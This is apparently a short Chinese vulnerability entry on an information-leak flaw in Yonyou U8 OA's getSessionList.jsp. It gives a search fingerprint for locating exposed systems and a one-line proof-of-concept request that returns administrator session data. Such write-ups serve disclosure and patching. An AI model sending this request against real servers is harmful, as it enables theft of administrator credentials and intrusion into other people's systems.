# 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

# 漏洞描述

用友 U8 OA getSessionList.jsp文件，通过漏洞攻击者可以获取数据库中管理员的账户信息

# 漏洞影响

用友 U8 OA

# 网络测绘

"用友U8-OA"

# 漏洞复现

登录页面

验证POC

/yyoa/ext/https/getSessionList.jsp?cmd=getAll

1

用友 U8 cloud upload.jsp 任意文件上传漏洞用友 U8 OA test.jsp SQL注入漏洞